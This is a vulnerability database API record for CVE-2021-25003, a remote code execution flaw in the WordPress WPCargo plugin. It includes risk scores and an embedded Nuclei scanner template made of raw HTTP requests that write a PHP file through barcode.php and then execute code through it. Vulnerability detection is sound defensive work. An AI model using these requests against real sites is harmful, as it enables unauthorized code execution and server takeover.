{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-25003/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-25003/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-25003/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-25003/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-25003/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-25003"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-25003"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.56148,
      "kev": false,
      "percentile": 0.99004
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2021/CVE-2021-25003.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2021-25003\n\ninfo:\n  name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n  impact: |\n    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a\n    - https://wordpress.org/plugins/wpcargo/\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-25003\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/WhooAmii/POC_to_review\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-25003\n    cwe-id: CWE-434,CWE-94\n    epss-score: 0.56148\n    epss-percentile: 0.99004\n    cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\\&_trace:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: wptaskforce\n    product: wpcargo_track_\\&_trace\n    framework: wordpress\n  tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce,vkev,vuln\nvariables:\n  num: \"999999999\"\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        2={{md5(num)}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code_1 != 200\n          - status_code_2 == 200\n          - status_code_3 == 200\n          - contains(body_3, md5(num))\n          - contains(body_3, 'PNG')\n        condition: and\n# digest: 490a00463044022069c345a2ce1dddb63086fc0ca73469993547122379507b58ed11e0a918247adf02201fa106c1086b9fdfc4d9aa5eb37c667959bb58b5312a61b1b89ad5111a62b28a:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2021-25003"
}